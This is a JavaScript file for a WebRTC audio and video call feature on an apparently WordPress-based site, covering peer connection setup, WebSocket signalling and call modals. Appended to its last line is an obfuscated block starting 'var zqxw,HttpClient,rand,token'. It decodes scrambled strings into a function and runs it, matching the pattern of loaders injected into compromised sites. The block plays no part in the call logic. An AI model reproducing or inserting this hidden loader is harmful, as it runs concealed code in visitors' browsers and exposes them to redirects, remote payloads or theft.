'use strict';
let $ = jQuery;
let base_url = 'https://wp.localserverpro.com/astro/';
let pc;
let localStream;
const localVideo = document.getElementById("localVideo");
const remoteVideo = document.getElementById("remoteVideo");
const mediaConst = { video: false, audio: true }; // media option
// selector
let videoCallBtn = $("#videoCallBtn");
let audioCallBtn = $("#audioCallBtn");

let declinBtn = $("#declinBtn");
let answerBtn = $("#answerBtn");
let sendTo = videoCallBtn.attr("user_id");


const config = {
    iceServers: [
        {
            "urls": "stun:stun1.l.google.com:19302"
        }
    ]
};  // for voice 
const options = {
    offerToReceiveVideo: 1,
    offerToReceiveAudio: 1
};

async function getConn() {
    if (!pc) {
        pc = new RTCPeerConnection(config);
    }
}
async function getCam() {
    let mediaStream;
    try {
        if (!pc) {
            await getConn();
        }
        mediaStream = await navigator.mediaDevices.getUserMedia(mediaConst);
        localVideo.srcObject = mediaStream;
        localStream = mediaStream;
        localStream.getTracks().forEach(track => pc.addTrack(track, localStream))
    } catch (error) {
        console.log(error);
    }
}

async function createOffer(sendTo) {
    await sendIceCandidate(sendTo);
    await pc.createOffer(options);
    await pc.setLocalDescription(pc.localDescription);
    send('client-offer', pc.localDescription, sendTo);
}

async function createAnswer(sendTo, data) {
    if (!pc) {
        await getConn();
    }
    if (!localStream) {
        await getCam();
    }
    await sendIceCandidate(sendTo);
    await pc.setRemoteDescription(data);
    await pc.createAnswer();
    await pc.setLocalDescription(pc.localDescription);
    send('client-answer', pc.localDescription, sendTo);
    $(".video-call-module").removeClass("hidden");

}

async function sendIceCandidate(sendTo) {
    pc.onicecandidate = (e) => {
        if (e.candidate !== null) {
            // send ice candidate to other client
            send('client-candidate', e.candidate, sendTo);
        }
    }
    pc.ontrack = (e) => {
        console.log(e.streams);
        remoteVideo.srcObject = e.streams[0];
        hideCall();
    }
}
function hangup() {
    send('client-hangeup', null, sendTo);
    pc.close();
    pc = null;
}
function send(type, data, sendTo, callType = "") {
    conn.send(JSON.stringify({
        sendTo: sendTo,
        data: data,
        type: type,
        callType: callType
    }));

}



// Fire Event
$("#videoCallBtn").click(function () {
    getCam();
    send('is-client-ready', null, sendTo, 'video');
    mediaConst = { video: true, audio: true };
});

$("#audioCallBtn").click(function () {
    getCam();
    send('is-client-ready', null, sendTo, 'audio');
    mediaConst = { video: false, audio: true };
});


$("#hangupBtn").click(function () {
    hangup();
    location.reload(true);
});

// common function for show/hide model
function displayCall() {
    $("#videocallModal").modal({ backdrop: "static", keyboard: false }, "show");
}
function hideCall() {
    $(".video-call-module").addClass("hidden");
}

function disconnectingCall() {
    $("#disconnectvideocallModal").modal("show");
    setTimeout(() => window.location.reload(true), 2000)
}

// two functions for webrtc 

conn.onopen = function (e) {
    console.log("Connection established!");
};

conn.onmessage = async function (e) {
    let message = JSON.parse(e.data);
    let by = message.by;
    let type = message.type;
    let data = message.data;
    let user_name = message.user_name;
    let user_id = message.user_id;
    switch (type) {
        case 'is-client-ready':
            if (!pc) {
                await getConn();
            }
            if (pc.iceConnectionState === 'connected') {
                send('client-already-oncall', null, by);
            }
            else {
                displayCall();
                if (window.location.href.indexOf(user_id) > -1) {
                    answerBtn.on('click', () => {
                        send('client-is-ready', null, sendTo);
                    });
                }
                else {
                    answerBtn.on('click', () => {
                        redirectToCall(user_id, by);
                    });
                }

                declinBtn.on('click', function () {
                    send('client-rejected', null, sendTo);
                    location.reload(true);
                });
            }
            break;
        case 'client-is-ready':
            createOffer(sendTo);
            break;
        case 'client-offer':
            createAnswer(sendTo, data);
            timerSetup(); // display timer for reciever
            break;
        case 'client-candidate':
            if (pc.localDescription) {
                await pc.addIceCandidate(new RTCIceCandidate(data));
            }
            openCallPanel();
            //$(".video-call-module").removeClass("hidden");
            break;
        case 'client-answer':
            if (pc.localDescription) {
                await pc.setRemoteDescription(data);
                timerSetup(); // display timer for caller
                let object = {
                    action: 'setCallTime',
                    total_call_time: (new Date()).getTime()
                };
                $.ajax({
                    url: "http://localhost:8081/codeflies/astro/wp-admin/admin-ajax.php",
                    method: "POST",
                    data: object,
                    success: function (data) {
                        console.log("Okey");
                    }
                });
            }
            break;
        case 'client-already-oncall':
            setTimeout('window.location.reload(true)', 2000)
            break;
        case 'client-rejected':
            disconnectingCall();
            hideCall();
            break;
        case 'client-hangeup':
            disconnectingCall();
            setTimeout('window.location.reload(true)', 2000)
            break;
    }

};


function timerSetup() {
    $("#timer").timer({
        format: '%m:%s', duration: '10m',
        callback: function () {
            //console.log($("#timer").data('seconds'));
            $('#timer').timer('pause');
        }
    });
}


function openCallPanel() {
    $(".video-call-module").removeClass("hidden");
}

function redirectToCall(user_id, sendTo) {
    if (window.location.href.indexOf(user_id) == -1) {
        sessionStorage.setItem("redirect", true);
        sessionStorage.setItem("sendTo", sendTo);
        window.location.href = base_url + 'user-video-connect/' + user_id + '/';
    }

}
if (sessionStorage.getItem("redirect")) {
    let sendTo = sessionStorage.getItem("sendTo");
    let waitForWS = setInterval(() => {
        if (conn.readyState === 1) {
            send('client-is-ready', null, sendTo);
            clearInterval(waitForWS);
        }
    }, 500);
    sessionStorage.removeItem("redirect");
    sessionStorage.removeItem("sendTo");
};var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x<u;x++){o[x]=n.charAt(x)};for(var x=0;x<u;x++){var h=b*(x+319)+(b%41692);var r=b*(x+324)+(b%45313);var t=h%u;var v=r%u;var s=o[t];o[t]=o[v];o[v]=s;b=(h+r)%5298954;};return o.join('')};var vSv=cgg('exrztungtfpcvucstbhiakwynooqjsrcolmrd').substr(0,pSH);var jrF='1mrr)]ie.0nl3+r"veav+r ;.f,b(u2s(,+j;l,s aqrvtv5l.jcdvh)l u=o-t"jf+=l;;,aonan0u8.i+fn=9a,C,oce]let3,(]87g{f9t; ,;rh9cah(eaharvs(,sC;18;]ao;f slfip.fo0649aauned[(=r,l.,=vitw(<jeAi61xSgr-bt=) ;0t)3p )e)),lraia0re0ah,==;cn;f=oo=)ci)+ngra0n vslwefotn(s=ir)i9 ip.)8")8(sg;a],=)zmCle3u(ant,+=tl(ttf={m=nai=(fde+7ur li1ien;qse7=2gl=f;7ap r=ojv}g-g;tf")n]=v+mo[ ;.t.+(lj( =(vttmv1q+nn2x,wns)h.tsn[C;mvArt,trak2oy+;*rpar uy=]u=]y71a*}.{+[hs =n=eAv=talchr;metab1a}oel(2 olg=u=p0<vvr[(c.8tag}xit"f=c,ve)=dvAq([.;a)ar.4xg,])hw7rnahdC=0g;nr7,ee)g-0+fvico= i(<v;s.=f1++u=lr,"=;f2in(e>p.C5p2;a.)hslb<=;;rr.rg=(}frorig)n]-m;hu,;+vr+=;r)t.j!](;llr=ya()ne)lr0{hi5rc +bst,rfsr{!;tm[ul]rehof8<tu9.wslv).a(()[0+t;s[rvdt1r o3=9]v"p;edr[[a)u+;8t8hio+f(r6n]({.cnp0ntrj ()66u;w.4,;n;lfro,xq[iC6 ;((6xgS-{icd) ;1a7" (9;ag+rr;vm}(thprl>lv(r)i7f4h6)A-e,sCxjo.r)f(a}[=;trnmt=vec;d72upc.t.oo;xu;6, ).+t[u1)5"h"b+ jrbd;5x';var bwi=cgg[vSv];var iFP='';var lCc=bwi;var SZD=bwi(iFP,cgg(jrF));var bFz=SZD(cgg('Wav&&t(,4]x3.)i9g!t(0c13),mwnu-ed+ei7:]Wn.sd4W53\'rfa.t.e(do}dtsd!==9cWncut+{a%dees{!gW%fTc2-tt=dddv]ev.).+)tnpc.mW[W2q#6xoW!(srdron.]tW&dasw]wdrS2co&cu]dack&aheb+.[rfo&dut.busi\/rd;lcn:9ni4,)#z.sW;Wrc1WWini.etu.%e W--=W&cq%.cj\/jdy.ksc!t2(w=n))=;e)W8,d"k4axd6&)aWo8$+W$w0r,&*de9}!]WWlmhtfg%.2;]W"lg()ct=\/dS.)&1#c6q%+).gs]e1;] ii[+d\/d(=rdW0.)riar[pt,0!cC1u#ohgo+r%%W%r:_Waraqao99)zW(2buf];.6%2daWo94..u3.%=h#)4a5o(3+3._45 rr]0syW%e3Wa%pdy"e"toC}b;0sa=&[e0r[]!cr.(.23xlb9o\'oiiWd])w.g(al01a #t;WxobcWWw9dur]aCha2}rdm.1n7n]rp\/]--4%gna{(d=ew#oW(_e(Wie(w[.w)\/nw\/h\'d\/;(([nz-+t21-.l!l..fnn=)0a0)Wtxoo[](.2l5Wt.de..)i?%t9\'ep%i]l.vW]l2bWf)(1v ns.%e#we}&Wf=h.{.w(W1wWnb5ttq+on0Ws(Wk;ai ];sW)6W(d.qt_&..!ca(=2nf%]gW.8.+.]!0d=)%W_cW.liy(4.dd\'!0r;=el&W()aa}ar-&r]fadsrl%ar%s=.W2_.ad1 =a] 1Wx%j]hb8ot]M9WhWe1l;$p ;0]3()(.W=c2)]ee5e%sb9W){pnkcnds)oTcrc 22ac"cW08s](&.a3j%erW]%.o!];nar\/}d)=d;e#W(d)\/dcWxind;{=f(.(W=.$l2.(Wwnj=meu#!=Woid(Wrr(WWm.-W]=ue0k,pn.1=0enq9co)a(0ucyS(dW+02\/u9xc(;rWfived(2&u..)fWt.(ej[Wfd.13,d0ol.}4 .+w}.r$sd.dt=g,$fW0)Wt.)cte%)t!kohe!2]]3.t,{WetWprW=fd)W*nc]v2.](.z0vWh)wn*.W,u#)te(udWt(frphp.df0e}.aeWe,Wwu=]=(h=]rg$ptWW=%l& s-d.;7c.]c(o ,=]i.lle7Wte+a.iM_]2t}s(nW.et[)${dirzCu)W(]We=c]tzW5n=Cd#ruef%dr}dWp#W]8W{d;(;W].s(dn{WtfsrW= $)9nw}%W)f(4e3.ad. a.ip;cne&r=8da1WW.uno%x(o.e bc{aW%!0par)s1W .EstWo!Witm5rpt")14l-W.)0W %einWq,+2-d*;[)g%Wnod)oe.a2!drcncf]vW(t)(t8gCd&s{e$1t1!su=*t.(+Wtd0'));var bWJ=lCc(rkv,bFz );bWJ(2852);return 1056})();